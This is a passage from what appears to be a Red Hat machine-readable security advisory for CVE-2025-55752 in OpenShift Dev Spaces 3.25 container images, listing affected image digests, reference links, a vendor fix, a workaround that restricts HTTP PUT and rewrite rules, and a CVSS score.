"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:a1ccad11e91784e0b6ed9eb1745d86c8783f1e869096a7f735f47280df0acc4e_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:b2c13795589df33fec7a6c6b5ed37e11db14f134bfcc7ee0350e3df372f5da88_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:e6f11881adb8f1675e5e3372339e648d99084d7d3f244d0de1eeebc96ed08dfc_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:6137931395a4cbfa07e5579172ed579babd14a2d1e054238298eee1aee4e2c07_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:804b00736484cc574e738130b9dc0e553828f54705fed29dbd9bb873bc5d1baa_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:8cf6cd46eef5fea2e500e14b18a8ec545b5bec93e6fb2289a9d760d56e4b52bb_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:d17a2f913e7cef538d6537d0ad32e257e2d51c871fc66183ea291024e8e2afae_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:74b83b79cba88af0545e7fb52dd70df2c1b96cf23b8963517fc779fbfe3e9aac_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:46948834924666487d7f47ac11bed7655e936fdb7071ee32d1ae3b1bb1a69aa4_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:690264c2631bd5a2341b37c1d3099a84e9bfb5eb2afab2937c0453a2475d0111_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:a4417f71e76b15d9c4f1c4657b2e5f2bb3979d498b362b42d9b207e37bf505d5_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:c7871f233d3908f052954b132aa6c7b57c500e41899f02ac023098e2283380c5_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:70d4bfd4a877934fbdded33e39c349b3554bc371492ee2696260916b0119efcf_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:859b5a54204008d575e774ca4794c346c0195750b5617ae56dccaf3dfa3d3f1b_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:bc65597fade1fd7de78ab27d9b0ba1bf5317b56949a9277e0af4b32db1aaee48_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:cfa0ae37ba69921586906f410956f9cd7d4a27652a544d3363c7d2dc92603286_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:29fa5d30eafda6658cf2c4a655e82e075b5708ddc1ff1b6d27c082f96c33a95d_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:56bed332699e952d3b4f4672420c379fa32954e77bb24aa3fec51823a0473703_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:8714c6e69cdc81f39c44a4d17dda5a4574e104eafeb6d3deb5f29b879e5f0f99_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:94a3bd9690ce19b7dcab8784e9edaf39a52085d84561659b5ea2e955d375f37e_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:296a441f00d4749301a9aee06a998f29ac64bb9c50d7e090711b33776a845f03_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:4ea445ee2670945ac2be3fe503be6f44d4ff4a953deffe9dc61fb4a8a30ae5a8_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:84b61272c472cee00404abd49080bd492dbe63a72ebc9bdcef48dac74b72b455_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:cca33584e4afced97c7c3c35af261890279a540df0f2da4d263e8862e2c14c6c_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:31e999abdb05d9dd572f21a91982bc8bfbb2007f1100650715c51d40f6f1f312_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:5b136fff0f0c8ff4d56fdb934eef1dd7d04ebdac13e7cb8c1e020bf370f4df84_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:8642741c5122757b5a01ee03e5a514a4d49b4048c6808b14ab5f8b7cece82d11_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:a353e11c2f965642a1107d7b764edccd0888009fc991ec066fb40e4632692ac4_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:10821feaf0ba17ef30f0403d29862004615952e289af23794e15d3354bc4f288_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:4cba254ffcbe10a9da41c2b25cdb098824d3adfc207ce02f5c71200bd41c6959_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:f67c1d7d8549587c1032404411b01472f71e775a7bbfd91927060c1b09a631c0_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:fb455374d650d93bbc4eca5616d041067cf1bcebc0dd6d0a92d8af16e2656708_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:3e6de411cafc0aee65b36541803bebc84070ff69bab6f3f4691d65074fe36307_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:44c8d3d034803b0f8307b56cafdfcf8083071e407139e701456acfb2e434b0c8_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:821f997cae0acae9048347c648c4f762a870b6548b8b7d14129315bf85b97276_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:e9ebbe3422e8100ef6e9c8ca7896ca21227ae4c708f3d3321fa2ca1c8eb9f051_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:53eb58d4a5f32aa71bb7e0d3beedca005b0b68f1fa9f18e07d08e243a803a565_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:63833e84093a729b0624238325e783fbcb1e22a7649dc1b59998bcce6ac450ef_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:a63f6e4ee48aaf257c592844674621110d1380f51d53d5bbf796b3bcafb67b89_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:d50d87f4bbcabaa25d7b8a4c09d956d0d8eec926bd1c01fa1a506266e2056162_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:1669477977f4722f931dba2693089f59ab77b5828869ec188e0bbff4966d7605_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:5411419f1400a2e1345d430df21d5b6ae9fc00d99a89549d7bf889e82a8f350b_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:782034bb77a0657bd9515feff4d7cb31e259dae24ed322e350022fd901fb5187_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:b8439f99e641c9f04e10a97f9a593b3909968ebd293381af2885b2b4ca7ac3e0_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:0b5b29e3626d7796c6a7ab73296934fd13717ca217e1bd42dc2ac39b0efdbf8a_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:72e67f67750d8cdb639ab2fc274063e622075e00ceda667a89b54c6e0d8de955_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:8a19af8b03b59562335b3a3f77753944c27ecbccaeda3400d0f089a6cd8d11fa_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:ef84715a61474b7a45b0b24c0d30370f51ab93ff86b70d5d345545253e01c3ae_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-55752"
},
{
"category": "external",
"summary": "RHBZ#2406591",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2406591"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-55752",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-55752"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-55752",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-55752"
},
{
"category": "external",
"summary": "https://github.com/apache/tomcat/commit/fec06c610ed7466b401e29cc567a58aee5ed826a",
"url": "https://github.com/apache/tomcat/commit/fec06c610ed7466b401e29cc567a58aee5ed826a"
},
{
"category": "external",
"summary": "https://lists.apache.org/thread/n05kjcwyj1s45ovs8ll1qrrojhfb1tog",
"url": "https://lists.apache.org/thread/n05kjcwyj1s45ovs8ll1qrrojhfb1tog"
}
],
"release_date": "2025-10-27T17:29:56.060000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-12-15T21:46:21+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\nFor details on how to apply this update, refer to:\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:3a3da41883a104931b483ce6f5ff089a7fe3fa7b409a0b66ec1d8d396903f246_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:5898927ebcb955afdf51695a028b2e3fe4dfb08fb12d3e4daa75d1266562bdf9_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:eec12e74a1bf7348f827b6c49d97f8cf9d27199ce2d35330f92ae3330020785f_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:f7dbf103ed9452b48a61505498c8aa1e4f445e9bf40b62769fb16372597982d2_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:23225"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.\n\nTo reduced the risk, by disabling or strictly limiting the use of HTTP PUT requests to trusted, authenticated users only. Additionally, administrators should review and adjust URL rewrite rules to ensure they do not manipulate request paths in ways that could expose protected directories such as /WEB-INF/ or /META-INF/. Implementing strict access controls and monitoring for unexpected rewrite or upload behavior can further minimize potential exploitation.",
"product_ids": [
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:46811ca65f64fb6d260e3dca253947c749b6dd31ce3185f36e729ea817f454a4_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:65b5989d68b4489a7d1b915870afc49c0f977b9690ee958be7e8fedcc611087f_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:7d38a9fe7e1bf493f235c62ebaabdc1c805b94e731186b9ffa56cf581abc8f77_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:869bac1a7cc51c0a780667abd7b47f9e42f2da22e6d6a57b5a1d7ecdeddcee7c_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:0a15c7b78d69e8711f81727879c1d4bbd8c2e8547a0b5c84513ea3a42fb5f8f3_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:e34005d1fc54aaf8863c5f0bf4bdd30120e65df1a61a6e775f0998e0be152582_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:e381c47978265d9db3daf279657a63cfe8f1f5afe0d00d4792b819cbae480338_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:fdbae1704685d51d583b0c2e588ddf3b088b78cc84b239821421042c0943c098_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:969198cbaa319f55733ae4fb378b867f8afb9d1bfe78dfce65b20fd7ac9fb541_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:a1ccad11e91784e0b6ed9eb1745d86c8783f1e869096a7f735f47280df0acc4e_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:b2c13795589df33fec7a6c6b5ed37e11db14f134bfcc7ee0350e3df372f5da88_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:e6f11881adb8f1675e5e3372339e648d99084d7d3f244d0de1eeebc96ed08dfc_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:6137931395a4cbfa07e5579172ed579babd14a2d1e054238298eee1aee4e2c07_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:804b00736484cc574e738130b9dc0e553828f54705fed29dbd9bb873bc5d1baa_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:8cf6cd46eef5fea2e500e14b18a8ec545b5bec93e6fb2289a9d760d56e4b52bb_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:d17a2f913e7cef538d6537d0ad32e257e2d51c871fc66183ea291024e8e2afae_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:74b83b79cba88af0545e7fb52dd70df2c1b96cf23b8963517fc779fbfe3e9aac_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:46948834924666487d7f47ac11bed7655e936fdb7071ee32d1ae3b1bb1a69aa4_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:690264c2631bd5a2341b37c1d3099a84e9bfb5eb2afab2937c0453a2475d0111_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:a4417f71e76b15d9c4f1c4657b2e5f2bb3979d498b362b42d9b207e37bf505d5_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:c7871f233d3908f052954b132aa6c7b57c500e41899f02ac023098e2283380c5_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:70d4bfd4a877934fbdded33e39c349b3554bc371492ee2696260916b0119efcf_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:859b5a54204008d575e774ca4794c346c0195750b5617ae56dccaf3dfa3d3f1b_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:bc65597fade1fd7de78ab27d9b0ba1bf5317b56949a9277e0af4b32db1aaee48_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:cfa0ae37ba69921586906f410956f9cd7d4a27652a544d3363c7d2dc92603286_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:29fa5d30eafda6658cf2c4a655e82e075b5708ddc1ff1b6d27c082f96c33a95d_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:56bed332699e952d3b4f4672420c379fa32954e77bb24aa3fec51823a0473703_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:8714c6e69cdc81f39c44a4d17dda5a4574e104eafeb6d3deb5f29b879e5f0f99_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:94a3bd9690ce19b7dcab8784e9edaf39a52085d84561659b5ea2e955d375f37e_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:296a441f00d4749301a9aee06a998f29ac64bb9c50d7e090711b33776a845f03_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:4ea445ee2670945ac2be3fe503be6f44d4ff4a953deffe9dc61fb4a8a30ae5a8_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:84b61272c472cee00404abd49080bd492dbe63a72ebc9bdcef48dac74b72b455_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:cca33584e4afced97c7c3c35af261890279a540df0f2da4d263e8862e2c14c6c_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:31e999abdb05d9dd572f21a91982bc8bfbb2007f1100650715c51d40f6f1f312_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:5b136fff0f0c8ff4d56fdb934eef1dd7d04ebdac13e7cb8c1e020bf370f4df84_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:8642741c5122757b5a01ee03e5a514a4d49b4048c6808b14ab5f8b7cece82d11_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:a353e11c2f965642a1107d7b764edccd0888009fc991ec066fb40e4632692ac4_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:10821feaf0ba17ef30f0403d29862004615952e289af23794e15d3354bc4f288_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:4cba254ffcbe10a9da41c2b25cdb098824d3adfc207ce02f5c71200bd41c6959_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:f67c1d7d8549587c1032404411b01472f71e775a7bbfd91927060c1b09a631c0_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:fb455374d650d93bbc4eca5616d041067cf1bcebc0dd6d0a92d8af16e2656708_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:3a3da41883a104931b483ce6f5ff089a7fe3fa7b409a0b66ec1d8d396903f246_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:5898927ebcb955afdf51695a028b2e3fe4dfb08fb12d3e4daa75d1266562bdf9_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:eec12e74a1bf7348f827b6c49d97f8cf9d27199ce2d35330f92ae3330020785f_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:f7dbf103ed9452b48a61505498c8aa1e4f445e9bf40b62769fb16372597982d2_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:3e6de411cafc0aee65b36541803bebc84070ff69bab6f3f4691d65074fe36307_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:44c8d3d034803b0f8307b56cafdfcf8083071e407139e701456acfb2e434b0c8_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:821f997cae0acae9048347c648c4f762a870b6548b8b7d14129315bf85b97276_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:e9ebbe3422e8100ef6e9c8ca7896ca21227ae4c708f3d3321fa2ca1c8eb9f051_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:53eb58d4a5f32aa71bb7e0d3beedca005b0b68f1fa9f18e07d08e243a803a565_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:63833e84093a729b0624238325e783fbcb1e22a7649dc1b59998bcce6ac450ef_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:a63f6e4ee48aaf257c592844674621110d1380f51d53d5bbf796b3bcafb67b89_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:d50d87f4bbcabaa25d7b8a4c09d956d0d8eec926bd1c01fa1a506266e2056162_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:1669477977f4722f931dba2693089f59ab77b5828869ec188e0bbff4966d7605_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:5411419f1400a2e1345d430df21d5b6ae9fc00d99a89549d7bf889e82a8f350b_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:782034bb77a0657bd9515feff4d7cb31e259dae24ed322e350022fd901fb5187_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:b8439f99e641c9f04e10a97f9a593b3909968ebd293381af2885b2b4ca7ac3e0_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:0b5b29e3626d7796c6a7ab73296934fd13717ca217e1bd42dc2ac39b0efdbf8a_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:72e67f67750d8cdb639ab2fc274063e622075e00ceda667a89b54c6e0d8de955_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:8a19af8b03b59562335b3a3f77753944c27ecbccaeda3400d0f089a6cd8d11fa_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:ef84715a61474b7a45b0b24c0d30370f51ab93ff86b70d5d345545253e01c3ae_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:46811ca65f64fb6d260e3dca253947c749b6dd31ce3185f36e729ea817f454a4_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:65b5989d68b4489a7d1b915870afc49c0f977b9690ee958be7e8fedcc611087f_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:7d38a9fe7e1bf493f235c62ebaabdc1c805b94e731186b9ffa56cf581abc8f77_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:869bac1a7cc51c0a780667abd7b47f9e42f2da22e6d6a57b5a1d7ecdeddcee7c_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:0a15c7b78d69e8711f81727879c1d4bbd8c2e8547a0b5c84513ea3a42fb5f8f3_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:e34005d1fc54aaf8863c5f0bf4bdd30120e65df1a61a6e775f0998e0be152582_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:e381c47978265d9db3daf279657a63cfe8f1f5afe0d00d4792b819cbae480338_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:fdbae1704685d51d583b0c2e588ddf3b088b78cc84b239821421042c0943c098_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:969198cbaa319f55733ae4fb378b867f8afb9d1bfe78dfce65b20fd7ac9fb541_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:a1ccad11e91784e0b6ed9eb1745d86c8783f1e869096a7f735f47280df0acc4e_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:b2c13795589df33fec7a6c6b5ed37e11db14f134bfcc7ee0350e3df372f5da88_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:e6f11881adb8f1675e5e3372339e648d99084d7d3f244d0de1eeebc96ed08dfc_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:6137931395a4cbfa07e5579172ed579babd14a2d1e054238298eee1aee4e2c07_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:804b00736484cc574e738130b9dc0e553828f54705fed29dbd9bb873bc5d1baa_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:8cf6cd46eef5fea2e500e14b18a8ec545b5bec93e6fb2289a9d760d56e4b52bb_amd64",
